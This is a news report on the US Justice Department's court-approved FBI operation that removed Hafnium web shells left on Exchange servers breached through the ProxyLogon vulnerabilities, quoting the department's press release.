A court in Houston has granted the FBI the authority to “copy and remove” web shells from hundreds of hacked computers in the United States running Microsoft Exchange software. The US Department of Justice has announced the operation on Tuesday, calling it “successful”.
In March 2021, Microsoft discovered a new China-backed hacking group, which it dubbed Hafnium, targeting Exchange servers using a set of vulnerabilities known as ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065). All of them were described as an input validation error issue and allow remote code execution using specially crafted data sent to the Exchange server.
The attacker exploited these vulnerabilities to gain initial access to the target systems and install an ASPX web shell on the compromised servers, which allowed them to steal data and perform additional malicious activities.
Although Microsoft addressed the vulnerabilities, the patches did not remove the backdoors from the compromised servers, which allowed other hacking groups to breach machines with the same flaws.
“Many infected system owners successfully removed the web shells from thousands of computers. Others appeared unable to do so, and hundreds of such web shells persisted unmitigated. This operation removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks. The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” said the DoJ in a press release.
“This operation was successful in copying and removing those web shells. However, it did not patch any Microsoft Exchange Server zero-day vulnerabilities or search for or remove any additional malware or hacking tools that hacking groups may have placed on victim networks by exploiting the web shells. The Department strongly encourages network defenders to review Microsoft’s remediation guidance and the March 10 Joint Advisory for further guidance on detection and patching,” it added.
Now the FBI is attempting to notify all owners or operators of systems from which it removed web shells.
